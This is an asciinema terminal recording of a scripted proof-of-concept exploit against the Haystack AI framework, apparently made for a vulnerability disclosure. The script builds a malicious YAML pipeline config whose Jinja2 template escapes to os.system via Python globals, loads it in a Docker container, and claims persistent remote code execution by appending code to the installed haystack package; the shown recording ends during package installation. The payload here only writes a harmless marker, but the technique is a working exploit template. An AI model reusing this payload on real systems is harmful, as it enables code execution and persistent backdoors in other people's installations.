{"version": 2, "width": 210, "height": 54, "timestamp": 1776180932, "env": {"SHELL": "/bin/bash", "TERM": "xterm"}}

[0.061558, "o", "\u001b[?2004h\u001b]0;vboxuser@Ubuntu-Server: ~/haystack_target\u0007vboxuser@Ubuntu-Server:~/haystack_target$ "]

[4.953578, "o", "# Start tracing\r\n"]

[4.953753, "o", "\rset -x\r\n\r\n\r# --- 1. SETUP ENVIRONMENT ---\r\n\recho -e \"\\e[1;34m>>> [STEP 1] Initializing Clean Sandbox (Haystack 2.27.0)\\e[0m\"\r\n\rdocker rm -f haystack-instance || true\r\n\rdocker run -d --name haystack-instance python:3.11-slim tail -f /dev/null\r\n\r\n\r# Pre-install framework\r\n\rdocker exec haystack-instance pip install haystack-ai==2.27.0 pyyaml\r\n\r\n\r# --- 2. THE MALICIOUS CONFIGURATION ---\r\n\recho -e \"\\e[1;33m>>> [STEP 2] Creating 'exploit.yaml' (The Trojan Horse)\\e[0m\"\r\n\r\n\rcat <<'EOF' > exploit.yaml\r\n\rcomponents:\r\n\r adapter:\r\n\r\u001b[7m type: haystack.components.converters.output_adapter.OutputAdapter\u001b[27m\r\n\r\u001b[7m init_parameters:\u001b[27m\r\n\r\u001b[7m template: |\u001b[27m\r\n\r\u001b[7m {{ trigger }}{{ self.__init__.__globals__.__builtins__.__import__('os').system('echo \"print(\\\"\\\\\\\"!!! NUKA-AI YAML SCOPE CHANGE: 10.0 CRITICAL !!!\\\\\\\"\\\")\" >> /usr/local/lib/python3.11/site-packages/hays\u001b[27m\u001b[7mt\u001b[27m\u001b[7mack/__init__.py') }}\u0000\u001b[27m\r\n\r\u001b[7m output_type: str\u001b[27m\r\n\r\u001b[7m unsafe: true\u001b[27m\r\n\r\u001b[7mconnections: []\u001b[27m\r\n\r\u001b[7minputs: {}\u001b[27m\r\n\r\u001b[7moutputs: {}\u001b[27m\r\n\r\u001b[7mEOF\u001b[27m\r\n\r\n\r\u001b[7m# --- NEW: PAYLOAD DISCLOSURE ---\u001b[27m\r\n\r\u001b[7mecho -e \"\\e[1;36m>>> [CONTENT VIEW] Reviewing Malicious YAML Payload:\\e[0m\"\u001b[27m\r\n\r\u001b[7mcat exploit.yaml\u001b[27m\r\n\r\n\r\u001b[7m# Transfer the payload\u001b[27m\r\n\r\u001b[7mdocker cp exploit.yaml haystack-instance:/tmp/exploit.yaml\u001b[27m\r\n\r\n\r\u001b[7m# --- 3. PRE-ATTACK INTEGRITY CHECK ---\u001b[27m\r\n\r\u001b[7mecho -e \"\\e[1;32m>>> [STEP 3] Verifying Clean System State\\e[0m\"\u001b[27m\r\n\r\u001b[7mdocker exec haystack-instance python3 -c \"import haystack; print('STATUS: Framework is untainted.')\"\u001b[27m\r\n\r\n\r\u001b[7m# --- 4. THE TRIGGER ---\u001b[27m\r\n\r\u001b[7mecho -e \"\\e[1;31m>>> [STEP 4] Victim App: Loading Untrusted YAML Configuration\\e[0m\"\u001b[27m\r\n\r\n\r\u001b[7mdocker exec haystack-instance python3 -c \"\u001b[27m\r\n\r\u001b[7mimport yaml\u001b[27m\r\n\r\u001b[7mfrom haystack import Pipeline\u001b[27m\r\n\r\u001b[7mwith open('/tmp/exploit.yaml', 'r') as f:\u001b[27m\r\n\r\u001b[7m data = yaml.safe_load(f)\u001b[27m\r\n\r\u001b[7mpipe = Pipeline.from_dict(data)\u001b[27m\r\n\r\u001b[7mprint('Pipeline initialized. Running trigger...')\u001b[27m\r\n\r\u001b[7mpipe.run(data={'adapter': {'trigger': 'fire'}})\u001b[27m\r\n\r\u001b[7m\"\u001b[27m\r\n\r\n\r\u001b[7m# --- 5. DISK ANALYSIS ---\u001b[27m\r\n\r\u001b[7mecho -e \"\\e[1;33m>>> [STEP 5] Forensic Check: Modified Framework Files on Disk\\e[0m\"\u001b[27m\r\u001b[7mdocker exec haystack-instance tail -n 3 /usr/local/lib/python3.11/site-packages/haystack/__init__.py\u001b[27m\r\u001b[7m# --- 6. PERSISTENCE PROOF ---\u001b[27m\r\u001b[7mecho -e \"\\e[1;31m>>> [STEP 6] SCOPE CHANGE PROOF: Every new process is now backdoored.\\e[0m\"\u001b[27m\r\u001b[7mdocker exec haystack-instance python3 -c \"import haystack; print('--- VERIFICATION COMPLETE ---')\"\u001b[27m\r\u001b[7m# --- 7. THE FINAL VERDICT ---\u001b[27m\r\u001b[7mset +x\u001b[27m\r\u001b[7mecho -e \"\\e[1;31m\"\u001b[27m\r\u001b[7mecho \"====================================================\"\u001b[27m\r\u001b[7mecho \" VULNERABILITY: PERSISTENT RCE VIA YAML DESERIAL \"\u001b[27m\r\u001b[7mecho \" PROJECT: NUKA-AI | CVSS SCORE: 10.0 (CRITICAL) \"\u001b[27m\r\u001b[7mecho \" STATUS: SCOPE CHANGE & PERSISTENCE CONFIRMED \"\u001b[27m\r\u001b[7mecho \"====================================================\"\u001b[27m\r\u001b[7mecho -e \"\\e[0m\"\u001b[27m\r\u001b[7mexit\u001b[27m"]

[6.23706, "o", "\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\u001b[A\r type: haystack.components.converters.output_adapter.OutputAdapter\r\n"]

[6.237207, "o", "\r init_parameters:\r\n\r template: |\r\n\r {{ trigger }}{{ self.__init__.__globals__.__builtins__.__import__('os').system('echo \"print(\\\"\\\\\\\"!!! NUKA-AI YAML SCOPE CHANGE: 10.0 CRITICAL !!!\\\\\\\"\\\")\" >> /usr/local/lib/python3.11/site-packages/haystack/__init__.py') }}\r\n\r output_type: str\r\n\r unsafe: true\r\n\rconnections: []\r\n\rinputs: {}\r\n\routputs: {}\r\n\rEOF\r\n\r\n\r# --- NEW: PAYLOAD DISCLOSURE ---\r\n\recho -e \"\\e[1;36m>>> [CONTENT VIEW] Reviewing Malicious YAML Payload:\\e[0m\"\r\n\rcat exploit.yaml\r\n\r\n\r# Transfer the payload\r\n\rdocker cp exploit.yaml haystack-instance:/tmp/exploit.yaml\r\n\r\n\r# --- 3. PRE-ATTACK INTEGRITY CHECK ---\r\n\recho -e \"\\e[1;32m>>> [STEP 3] Verifying Clean System State\\e[0m\"\r\n\rdocker exec haystack-instance python3 -c \"import haystack; print('STATUS: Framework is untainted.')\"\r\n\r\n\r# --- 4. THE TRIGGER ---\r\n\recho -e \"\\e[1;31m>>> [STEP 4] Victim App: Loading Untrusted YAML Configuration\\e[0m\"\r\n\r\n\rdocker exec haystack-instance python3 -c \"\r\n\rimport yaml\r\n\rfrom haystack import Pipeline\r\n\rwith open('/tmp/exploit.yaml', 'r') as f:\r\n\r data = yaml.safe_load(f)\r\n\rpipe = Pipeline.from_dict(data)\r\n\rprint('Pipeline initialized. Running trigger...')\r\n\rpipe.run(data={'adapter': {'trigger': 'fire'}})\r\n\r\"\r\n\r\n\r# --- 5. DISK ANALYSIS ---\r\n\recho -e \"\\e[1;33m>>> [STEP 5] Forensic Check: Modified Framework Files on Disk\\e[0m\"\rdocker exec haystack-instance tail -n 3 /usr/local/lib/python3.11/site-packages/haystack/__init__.py\r# --- 6. PERSISTENCE PROOF ---\recho -e \"\\e[1;31m>>> [STEP 6] SCOPE CHANGE PROOF: Every new process is now backdoored.\\e[0m\"\rdocker exec haystack-instance python3 -c \"import haystack; print('--- VERIFICATION COMPLETE ---')\"\r# --- 7. THE FINAL VERDICT ---\rset +x\recho -e \"\\e[1;31m\"\recho \"====================================================\"\recho \" VULNERABILITY: PERSISTENT RCE VIA YAML DESERIAL \"\recho \" PROJECT: NUKA-AI | CVSS SCORE: 10.0 (CRITICAL) \"\recho \" STATUS: SCOPE CHANGE & PERSISTENCE CONFIRMED \"\recho \"====================================================\"\recho -e \"\\e[0m\"\rexit\r\n\u001b[?2004l\r+ echo -e '\\e[1;34m>>> [STEP 1] Initializing Clean Sandbox (Haystack 2.27.0)\\e[0m'\r\n\u001b[1;34m>>> [STEP 1] Initializing Clean Sandbox (Haystack 2.27.0)\u001b[0m\r\n+ docker rm -f haystack-instance\r\n"]

[6.794797, "o", "haystack-instance\r\n"]

[6.798456, "o", "+ docker run -d --name haystack-instance python:3.11-slim tail -f /dev/null"]

[6.804056, "o", "\r\n"]

[7.135196, "o", "acca9708d0cb8dec9b6db3ca22c3219001250eaf55a3536160160f82a634f8fc"]

[7.13712, "o", "\r\n"]

[7.491748, "o", "+ docker exec haystack-instance pip install haystack-ai==2.27.0 pyyaml"]

[7.492162, "o", "\r\n"]

[11.329625, "o", "Collecting haystack-ai==2.27.0\r\n"]

[11.492303, "o", " Downloading haystack_ai-2.27.0-py3-none-any.whl.metadata (14 kB)\r\n"]

[11.728885, "o", "Collecting pyyaml\r\n"]

[11.774505, "o", " Downloading pyyaml-6.0.3-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl.metadata (2.4 kB)"]

[11.783843, "o", "\r\n"]

[11.884985, "o", "Collecting docstring-parser (from haystack-ai==2.27.0)"]

[11.885079, "o", "\r\n"]

[11.917651, "o", " Downloading docstring_parser-0.18.0-py3-none-any.whl.metadata (3.5 kB)"]

[11.918391, "o", "\r\n"]

[12.03973, "o", "Collecting filetype (from haystack-ai==2.27.0)\r\n"]

[12.086736, "o", " Downloading filetype-1.2.0-py2.py3-none-any.whl.metadata (6.5 kB)\r\n"]

[12.179459, "o", "Collecting haystack-experimental (from haystack-ai==2.27.0)\r\n"]

[12.211167, "o", " Downloading haystack_experimental-0.19.0-py3-none-any.whl.metadata (16 kB)\r\n"]

[12.289086, "o", "Collecting jinja2 (from haystack-ai==2.27.0)\r\n"]

[12.323975, "o", " Downloading jinja2-3.1.6-py3-none-any.whl.metadata (2.9 kB)\r\n"]

[12.463688, "o", "Collecting jsonschema (from haystack-ai==2.27.0)\r\n"]

[12.513435, "o", " Downloading jsonschema-4.26.0-py3-none-any.whl.metadata (7.6 kB)"]

[12.514174, "o", "\r\n"]

[12.634766, "o", "Collecting lazy-imports (from haystack-ai==2.27.0)\r\n"]

[12.66971, "o", " Downloading lazy_imports-1.2.0-py3-none-any.whl.metadata (11 kB)\r\n"]

[12.870046, "o", "Collecting markupsafe (from haystack-ai==2.27.0)\r\n"]

[12.898387, "o", " Downloading markupsafe-3.0.3-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl.metadata (2.7 kB)\r\n"]

[13.072284, "o", "Collecting more-itertools (from haystack-ai==2.27.0)\r\n"]

[13.103673, "o", " Downloading more_itertools-11.0.2-py3-none-any.whl.metadata (41 kB)\r\n"]

[13.120699, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 41.4/41.4 kB 1.9 MB/s eta 0:00:00"]

[13.121898, "o", "\r\n"]

[13.206861, "o", "Collecting networkx (from haystack-ai==2.27.0)\r\n"]

[13.233654, "o", " Downloading networkx-3.6.1-py3-none-any.whl.metadata (6.8 kB)\r\n"]

[13.672781, "o", "Collecting numpy (from haystack-ai==2.27.0)\r\n"]

[13.702469, "o", " Downloading numpy-2.4.4-cp311-cp311-manylinux_2_27_x86_64.manylinux_2_28_x86_64.whl.metadata (6.6 kB)\r\n"]

[13.963629, "o", "Collecting openai>=1.99.2 (from haystack-ai==2.27.0)\r\n"]

[14.017963, "o", " Downloading openai-2.31.0-py3-none-any.whl.metadata (31 kB)\r\n"]

[14.129553, "o", "Collecting posthog!=3.12.0 (from haystack-ai==2.27.0)\r\n"]

[14.159411, "o", " Downloading posthog-7.11.1-py3-none-any.whl.metadata (6.2 kB)"]

[14.15979, "o", "\r\n"]

[14.505226, "o", "Collecting pydantic (from haystack-ai==2.27.0)"]

[14.507604, "o", "\r\n"]

[14.539195, "o", " Downloading pydantic-2.13.0-py3-none-any.whl.metadata (107 kB)\r\n"]

[14.612068, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 107.9/107.9 kB 1.7 MB/s eta 0:00:00"]

[14.614467, "o", "\r\n"]

[14.718986, "o", "Collecting python-dateutil (from haystack-ai==2.27.0)\r\n"]

[14.748412, "o", " Downloading python_dateutil-2.9.0.post0-py2.py3-none-any.whl.metadata (8.4 kB)"]

[14.749961, "o", "\r\n"]

[14.887219, "o", "Collecting requests (from haystack-ai==2.27.0)"]

[14.88832, "o", "\r\n"]

[14.939134, "o", " Downloading requests-2.33.1-py3-none-any.whl.metadata (4.8 kB)\r\n"]

[15.034099, "o", "Collecting tenacity!=8.4.0 (from haystack-ai==2.27.0)\r\n"]

[15.059642, "o", " Downloading tenacity-9.1.4-py3-none-any.whl.metadata (1.2 kB)\r\n"]

[15.250489, "o", "Collecting tqdm (from haystack-ai==2.27.0)\r\n"]

[15.280409, "o", " Downloading tqdm-4.67.3-py3-none-any.whl.metadata (57 kB)"]

[15.280596, "o", "\r\n"]

[15.31831, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.7/57.7 kB 1.6 MB/s eta 0:00:00\r\n"]

[15.429615, "o", "Collecting typing-extensions>=4.7 (from haystack-ai==2.27.0)\r\n"]

[15.490448, "o", " Downloading typing_extensions-4.15.0-py3-none-any.whl.metadata (3.3 kB)\r\n"]

[15.677344, "o", "Collecting anyio<5,>=3.5.0 (from openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[15.722374, "o", " Downloading anyio-4.13.0-py3-none-any.whl.metadata (4.5 kB)\r\n"]

[15.804292, "o", "Collecting distro<2,>=1.7.0 (from openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[15.8334, "o", " Downloading distro-1.9.0-py3-none-any.whl.metadata (6.8 kB)\r\n"]

[16.033282, "o", "Collecting httpx<1,>=0.23.0 (from openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[16.074396, "o", " Downloading httpx-0.28.1-py3-none-any.whl.metadata (7.1 kB)"]

[16.076715, "o", "\r\n"]

[16.343423, "o", "Collecting jiter<1,>=0.10.0 (from openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[16.380107, "o", " Downloading jiter-0.14.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (5.2 kB)\r\n"]

[16.587833, "o", "Collecting sniffio (from openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[16.624235, "o", " Downloading sniffio-1.3.1-py3-none-any.whl.metadata (3.9 kB)\r\n"]

[16.796289, "o", "Collecting six>=1.5 (from posthog!=3.12.0->haystack-ai==2.27.0)\r\n"]

[16.830656, "o", " Downloading six-1.17.0-py2.py3-none-any.whl.metadata (1.7 kB)"]

[16.831983, "o", "\r\n"]

[16.907134, "o", "Collecting backoff>=1.10.0 (from posthog!=3.12.0->haystack-ai==2.27.0)"]

[16.907234, "o", "\r\n"]

[16.93374, "o", " Downloading backoff-2.2.1-py3-none-any.whl.metadata (14 kB)"]

[16.93584, "o", "\r\n"]

[17.118192, "o", "Collecting annotated-types>=0.6.0 (from pydantic->haystack-ai==2.27.0)\r\n"]

[17.155368, "o", " Downloading annotated_types-0.7.0-py3-none-any.whl.metadata (15 kB)\r\n"]

[18.576034, "o", "Collecting pydantic-core==2.46.0 (from pydantic->haystack-ai==2.27.0)\r\n"]

[18.635132, "o", " Downloading pydantic_core-2.46.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (6.6 kB)\r\n"]

[18.778973, "o", "Collecting typing-inspection>=0.4.2 (from pydantic->haystack-ai==2.27.0)\r\n"]

[18.82834, "o", " Downloading typing_inspection-0.4.2-py3-none-any.whl.metadata (2.6 kB)\r\n"]

[19.214041, "o", "Collecting charset_normalizer<4,>=2 (from requests->haystack-ai==2.27.0)\r\n"]

[19.262801, "o", " Downloading charset_normalizer-3.4.7-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl.metadata (40 kB)"]

[19.263558, "o", "\r\n"]

[19.304096, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 40.9/40.9 kB 1.3 MB/s eta 0:00:00"]

[19.304862, "o", "\r\n"]

[19.407858, "o", "Collecting idna<4,>=2.5 (from requests->haystack-ai==2.27.0)"]

[19.409392, "o", "\r\n"]

[19.437444, "o", " Downloading idna-3.11-py3-none-any.whl.metadata (8.4 kB)"]

[19.438576, "o", "\r\n"]

[19.564313, "o", "Collecting urllib3<3,>=1.26 (from requests->haystack-ai==2.27.0)"]

[19.566635, "o", "\r\n"]

[19.606725, "o", " Downloading urllib3-2.6.3-py3-none-any.whl.metadata (6.9 kB)\r\n"]

[19.691224, "o", "Collecting certifi>=2023.5.7 (from requests->haystack-ai==2.27.0)\r\n"]

[19.717957, "o", " Downloading certifi-2026.2.25-py3-none-any.whl.metadata (2.5 kB)"]

[19.718676, "o", "\r\n"]

[19.880996, "o", "Collecting attrs>=22.2.0 (from jsonschema->haystack-ai==2.27.0)\r\n"]

[19.916708, "o", " Downloading attrs-26.1.0-py3-none-any.whl.metadata (8.8 kB)\r\n"]

[20.050896, "o", "Collecting jsonschema-specifications>=2023.03.6 (from jsonschema->haystack-ai==2.27.0)\r\n"]

[20.088006, "o", " Downloading jsonschema_specifications-2025.9.1-py3-none-any.whl.metadata (2.9 kB)\r\n"]

[20.244425, "o", "Collecting referencing>=0.28.4 (from jsonschema->haystack-ai==2.27.0)\r\n"]

[20.282093, "o", " Downloading referencing-0.37.0-py3-none-any.whl.metadata (2.8 kB)\r\n"]

[20.879685, "o", "Collecting rpds-py>=0.25.0 (from jsonschema->haystack-ai==2.27.0)\r\n"]

[20.908968, "o", " Downloading rpds_py-0.30.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.1 kB)\r\n"]

[21.25505, "o", "Collecting httpcore==1.* (from httpx<1,>=0.23.0->openai>=1.99.2->haystack-ai==2.27.0)\r\n"]

[21.318119, "o", " Downloading httpcore-1.0.9-py3-none-any.whl.metadata (21 kB)\r\n"]

[21.44239, "o", "Collecting h11>=0.16 (from httpcore==1.*->httpx<1,>=0.23.0->openai>=1.99.2->haystack-ai==2.27.0)"]

[21.443746, "o", "\r\n"]

[21.475183, "o", " Downloading h11-0.16.0-py3-none-any.whl.metadata (8.3 kB)"]

[21.477826, "o", "\r\n"]

[21.629179, "o", "Downloading haystack_ai-2.27.0-py3-none-any.whl (698 kB)\r\n"]

[21.759413, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 698.2/698.2 kB 6.1 MB/s eta 0:00:00"]

[21.762459, "o", "\r\n"]

[21.80947, "o", "Downloading pyyaml-6.0.3-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl (806 kB)\r\n"]

[21.977405, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 806.6/806.6 kB 4.9 MB/s eta 0:00:00\r\n"]

[22.03322, "o", "Downloading openai-2.31.0-py3-none-any.whl (1.2 MB)\r\n"]

[22.397221, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 3.3 MB/s eta 0:00:00\r\n"]

[22.430539, "o", "Downloading posthog-7.11.1-py3-none-any.whl (219 kB)\r\n"]

[22.488157, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 220.0/220.0 kB 3.9 MB/s eta 0:00:00"]

[22.49109, "o", "\r\n"]

[22.522125, "o", "Downloading pydantic-2.13.0-py3-none-any.whl (471 kB)\r\n"]

[22.646906, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 471.9/471.9 kB 3.9 MB/s eta 0:00:00\r\n"]

[22.708823, "o", "Downloading pydantic_core-2.46.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)"]

[22.712272, "o", "\r\n"]

[23.0872, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 5.4 MB/s eta 0:00:00"]

[23.088824, "o", "\r\n"]

[23.133852, "o", "Downloading python_dateutil-2.9.0.post0-py2.py3-none-any.whl (229 kB)\r\n"]

[23.205788, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 229.9/229.9 kB 3.2 MB/s eta 0:00:00\r\n"]

[23.243696, "o", "Downloading requests-2.33.1-py3-none-any.whl (64 kB)"]

[23.25005, "o", "\r\n"]

[23.268167, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 64.9/64.9 kB 2.3 MB/s eta 0:00:00\r\n"]

[23.331575, "o", "Downloading tenacity-9.1.4-py3-none-any.whl (28 kB)"]

[23.336157, "o", "\r\n"]

[23.383459, "o", "Downloading tqdm-4.67.3-py3-none-any.whl (78 kB)\r\n"]

[23.419676, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 78.4/78.4 kB 3.2 MB/s eta 0:00:00"]

[23.4216, "o", "\r\n"]

[23.473143, "o", "Downloading typing_extensions-4.15.0-py3-none-any.whl (44 kB)\r\n"]

[23.4985, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 44.6/44.6 kB 1.4 MB/s eta 0:00:00"]

[23.498995, "o", "\r\n"]

[23.525969, "o", "Downloading docstring_parser-0.18.0-py3-none-any.whl (22 kB)"]

[23.526187, "o", "\r\n"]

[23.564204, "o", "Downloading filetype-1.2.0-py2.py3-none-any.whl (19 kB)"]

[23.565205, "o", "\r\n"]

[23.613814, "o", "Downloading haystack_experimental-0.19.0-py3-none-any.whl (63 kB)\r\n"]

[23.678763, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 63.1/63.1 kB 827.7 kB/s eta 0:00:00"]

[23.680564, "o", "\r\n"]

[23.736876, "o", "Downloading jinja2-3.1.6-py3-none-any.whl (134 kB)\r\n"]

[23.78976, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 134.9/134.9 kB 2.8 MB/s eta 0:00:00"]

[23.792508, "o", "\r\n"]

[23.830416, "o", "Downloading markupsafe-3.0.3-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl (22 kB)\r\n"]

[23.893378, "o", "Downloading jsonschema-4.26.0-py3-none-any.whl (90 kB)\r\n"]

[23.932175, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 90.6/90.6 kB 1.7 MB/s eta 0:00:00\r\n"]

[23.967769, "o", "Downloading lazy_imports-1.2.0-py3-none-any.whl (18 kB)\r\n"]

[24.034021, "o", "Downloading more_itertools-11.0.2-py3-none-any.whl (71 kB)\r\n"]

[24.053109, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 71.9/71.9 kB 4.7 MB/s eta 0:00:00\r\n"]

[24.109494, "o", "Downloading networkx-3.6.1-py3-none-any.whl (2.1 MB)\r\n"]

[24.522949, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.1/2.1 MB 5.0 MB/s eta 0:00:00"]

[24.523895, "o", "\r\n"]

[24.560456, "o", "Downloading numpy-2.4.4-cp311-cp311-manylinux_2_27_x86_64.manylinux_2_28_x86_64.whl (16.9 MB)\r\n"]

[27.348136, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 16.9/16.9 MB 6.5 MB/s eta 0:00:00\r\n"]

[27.37809, "o", "Downloading annotated_types-0.7.0-py3-none-any.whl (13 kB)"]

[27.379477, "o", "\r\n"]

[27.44046, "o", "Downloading anyio-4.13.0-py3-none-any.whl (114 kB)\r\n"]

[27.47133, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 114.4/114.4 kB 3.7 MB/s eta 0:00:00"]

[27.471693, "o", "\r\n"]

[27.50035, "o", "Downloading attrs-26.1.0-py3-none-any.whl (67 kB)\r\n"]

[27.51325, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 67.5/67.5 kB 5.7 MB/s eta 0:00:00"]

[27.514145, "o", "\r\n"]

[27.544346, "o", "Downloading backoff-2.2.1-py3-none-any.whl (15 kB)\r\n"]

[27.580699, "o", "Downloading certifi-2026.2.25-py3-none-any.whl (153 kB)\r\n"]

[27.616253, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 153.7/153.7 kB 7.1 MB/s eta 0:00:00\r\n"]

[27.658817, "o", "Downloading charset_normalizer-3.4.7-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl (214 kB)\r\n"]

[27.682731, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 214.1/214.1 kB 7.8 MB/s eta 0:00:00\r\n"]

[27.712279, "o", "Downloading distro-1.9.0-py3-none-any.whl (20 kB)"]

[27.713056, "o", "\r\n"]

[27.750431, "o", "Downloading httpx-0.28.1-py3-none-any.whl (73 kB)\r\n"]

[27.774869, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 73.5/73.5 kB 3.1 MB/s eta 0:00:00\r\n"]

[27.805262, "o", "Downloading httpcore-1.0.9-py3-none-any.whl (78 kB)"]

[27.808851, "o", "\r\n"]

[27.847724, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 78.8/78.8 kB 2.5 MB/s eta 0:00:00\r\n"]

[27.896738, "o", "Downloading idna-3.11-py3-none-any.whl (71 kB)"]

[27.899131, "o", "\r\n"]

[27.922032, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 71.0/71.0 kB 3.5 MB/s eta 0:00:00\r\n"]

[27.954166, "o", "Downloading jiter-0.14.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (358 kB)\r\n"]

[28.014057, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 358.7/358.7 kB 6.2 MB/s eta 0:00:00"]

[28.014252, "o", "\r\n"]

[28.043623, "o", "Downloading jsonschema_specifications-2025.9.1-py3-none-any.whl (18 kB)"]

[28.044756, "o", "\r\n"]

[28.087351, "o", "Downloading referencing-0.37.0-py3-none-any.whl (26 kB)"]

[28.088285, "o", "\r\n"]

[28.12968, "o", "Downloading rpds_py-0.30.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (390 kB)\r\n"]

[28.191505, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 390.8/390.8 kB 6.7 MB/s eta 0:00:00"]

[28.192019, "o", "\r\n"]

[28.222017, "o", "Downloading six-1.17.0-py2.py3-none-any.whl (11 kB)"]

[28.224657, "o", "\r\n"]

[28.275118, "o", "Downloading typing_inspection-0.4.2-py3-none-any.whl (14 kB)"]

[28.275175, "o", "\r\n"]

[28.32445, "o", "Downloading urllib3-2.6.3-py3-none-any.whl (131 kB)\r\n"]

[28.358927, "o", " ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 131.6/131.6 kB 3.9 MB/s eta 0:00:00"]

[28.361206, "o", "\r\n"]

[28.400536, "o", "Downloading sniffio-1.3.1-py3-none-any.whl (10 kB)\r\n"]

[28.509603, "o", "Downloading h11-0.16.0-py3-none-any.whl (37 kB)\r\n"]

[28.896701, "o", "Installing collected packages: filetype, urllib3, typing-extensions, tqdm, tenacity, sniffio, six, rpds-py, pyyaml, numpy, networkx, more-itertools, markupsafe, lazy-imports, jiter, idna, h11, docstring-parser, distro, charset_normalizer, certifi, backoff, attrs, annotated-types, typing-inspection, requests, referencing, python-dateutil, pydantic-core, jinja2, httpcore, anyio, pydantic, posthog, jsonschema-specifications, httpx, openai, jsonschema, haystack-experimental, haystack-ai\r\n"]

[37.461702, "o", "Successfully installed annotated-types-0.7.0 anyio-4.13.0 attrs-26.1.0 backoff-2.2.1 certifi-2026.2.25 charset_normalizer-3.4.7 distro-1.9.0 docstring-parser-0.18.0 filetype-1.2.0 h11-0.16.0 haystack-ai-2.27.0 haystack-experimental-0.19.0 httpcore-1.0.9 httpx-0.28.1 idna-3.11 jinja2-3.1.6 jiter-0.14.0 jsonschema-4.26.0 jsonschema-specifications-2025.9.1 lazy-imports-1.2.0 markupsafe-3.0.3 more-itertools-11.0.2 networkx-3.6.1 numpy-2.4.4 openai-2.31.0 posthog-7.11.1 pydantic-2.13.0 pydantic-core-2.46.0 python-dateutil-2.9.0.post0 pyyaml-6.0.3 referencing-0.37.0 requests-2.33.1 rpds-py-0.30.0 six-1.17.0 sniffio-1.3.1 tenacity-9.1.4 tqdm-4.67.3 typing-extensions-4.15.0 typing-inspection-0.4.2 urllib3-2.6.3"]

[37.466211, "o", "\r\nWARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv\r\n"]

[37.739776, "o", "\r\n[notice] A new release of pip is available: 24.0 -> 26.0.1\r\n[notice] To update, run: pip install --upgrade pip\r\n"]

